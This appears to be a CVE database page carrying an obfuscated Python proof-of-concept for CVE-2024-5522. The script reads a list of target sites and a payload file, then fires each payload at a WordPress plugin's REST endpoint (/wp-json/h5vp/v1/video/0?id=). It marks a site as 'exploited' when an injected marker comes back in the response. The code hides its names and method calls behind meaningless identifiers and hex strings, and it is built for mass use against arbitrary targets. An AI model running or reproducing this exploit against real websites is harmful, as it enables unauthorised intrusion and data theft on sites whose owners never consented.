4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
lllllllllllllll, llllllllllllllI, lllllllllllllIl, lllllllllllllII, llllllllllllIll, llllllllllllIlI = open, print, __name__, input, getattr, bytes

from os.path import expanduser as llIIIIllllIIIl
from requests import get as IIIIlIlIlllIII
from requests.exceptions import RequestException as IlllIIIlllIlII
lllIlIlIlIlIIIlIIl = 'payload.txt'
from colorama import Fore as IlIllIIIIIIlIl

def IIlllIIlllllIIIlII():
    IllIllIIllllllIIII = '\n       ______   ______    ___ ___  ___ ____     ____ ____ ___  ___ \n      / ___| | / / ______|_  / _ \\|_  / / /____/ __// __/|_  ||_  |\n     / /__ | |/ / _//___/ __/ // / __/_  _/___/__ \\/__ \\/ __// __/ \n     \\___/ |___/___/   /____\\___/____//_/    /____/____/____/____/ \n                                        CVE-2024-5522 scanner\n                                        made by KryptonSec_My\n    '
    llllllllllllllI(IllIllIIllllllIIII)

def llIlIlllIIIlIIllll(lIlllllIIllIlIllIl):
    IllIllIIllllllIIII = llIIIIllllIIIl(lIlllllIIllIlIllIl)
    with lllllllllllllll(IllIllIIllllllIIII, 'r') as lllIIlIlllIlIllIll:
        return [llllllllllllIll(IllIllIIllllllIIII, llllllllllllIll(llllllllllllIlI, 'fromhex')('7374726970').decode())() for IllIllIIllllllIIII in llllllllllllIll(lllIIlIlllIlIllIll, llllllllllllIll(llllllllllllIlI, 'fromhex')('726561646c696e6573').decode())()]

def llIllllIlIIllIIlIl(lIlllllIIllIlIllIl):
    with lllllllllllllll(lllIlIlIlIlIIIlIIl, 'r') as IllIllIIllllllIIII:
        return [llllllllllllIll(IllIllIIllllllIIII, llllllllllllIll(llllllllllllIlI, 'fromhex')('7374726970').decode())() for IllIllIIllllllIIII in llllllllllllIll(IllIllIIllllllIIII, llllllllllllIll(llllllllllllIlI, 'fromhex')('726561646c696e6573').decode())()]

def IlIllIlIlIIIIlIllI(llllllIIIlllIIIIIl, IIIIllIlIlIIIIIlII, lIIIlllIllIIllIIlI):
    IllIllIIllllllIIII = llllllIIIlllIIIIIl
    if not llllllllllllIll(IllIllIIllllllIIII, llllllllllllIll(llllllllllllIlI, 'fromhex')('73746172747377697468').decode())('http'):
        IllIllIIllllllIIII = 'https://' + IllIllIIllllllIIII
    lllIIlIlllIlIllIll = f'{IllIllIIllllllIIII}/wp-json/h5vp/v1/video/0?id={IIIIllIlIlIIIIIlII}'
    try:
        lIIIllllIllllllllI = IIIIlIlIlllIII(lllIIlIlllIlIllIll, timeout=10)
        if 'Injected By KryptonSec_My' in lIIIllllIllllllllI.text:
            llllllllllllllI(IlIllIIIIIIlIl.GREEN + f'[+] Target Has Been Exploit! :D {IllIllIIllllllIIII}' + IlIllIIIIIIlIl.WHITE)
            llllllllllllIll(lIIIlllIllIIllIIlI, llllllllllllIll(llllllllllllIlI, 'fromhex')('617070656e64').decode())(lllIIlIlllIlIllIll)
        else:
            llllllllllllllI(IlIllIIIIIIlIl.RED + f'[-] {IllIllIIllllllIIII} seems not vulnerable :(' + IlIllIIIIIIlIl.WHITE)
    except IlllIIIlllIlII as IIlIIllllllllIlIll:
        llllllllllllllI(IlIllIIIIIIlIl.RED + f'[!] Error connecting to {IllIllIIllllllIIII}: {IIlIIllllllllIlIll}' + IlIllIIIIIIlIl.WHITE)

def lIIllIIIIlllllIlII(llIIlllllllIllllIl, lIlIIIIIIllIIIlIlI):
    lIIIllllIllllllllI = llIlIlllIIIlIIllll(llIIlllllllIllllIl)
    IIlIIllllllllIlIll = llIllllIlIIllIIlIl(lIlIIIIIIllIIIlIlI)
    IllIllIIllllllIIII = []
    for lllIIlIlllIlIllIll in lIIIllllIllllllllI:
        llllllllllllllI(IlIllIIIIIIlIl.CYAN + f'\n[Scanning {lllIIlIlllIlIllIll}]' + IlIllIIIIIIlIl.WHITE)
        for IIlIlIlIIIIlIIlllI in IIlIIllllllllIlIll:
            IlIllIlIlIIIIlIllI(lllIIlIlllIlIllIll, IIlIlIlIIIIlIIlllI, IllIllIIllllllIIII)
    if IllIllIIllllllIIII:
        llllllllllllllI(IlIllIIIIIIlIl.BLUE + '\n[Exploited URLs]' + IlIllIIIIIIlIl.WHITE)
        for lllIIIlIIlIIlIIIII in IllIllIIllllllIIII:
            llllllllllllllI(lllIIIlIIlIIlIIIII + IlIllIIIIIIlIl.CYAN + '\n[+]' + IlIllIIIIIIlIl.WHITE)
    else:
        llllllllllllllI(IlIllIIIIIIlIl.RED + '\nNo vulnerabilities found.' + IlIllIIIIIIlIl.WHITE)
if lllllllllllllIl == '__main__':
    IIlllIIlllllIIIlII()
    llIIlllllllIllllIl = lllllllllllllII('Enter the path to the target list: ')
    lIIllIIIIlllllIlII(llIIlllllllIllllIl, lllIlIlIlIlIIIlIIl)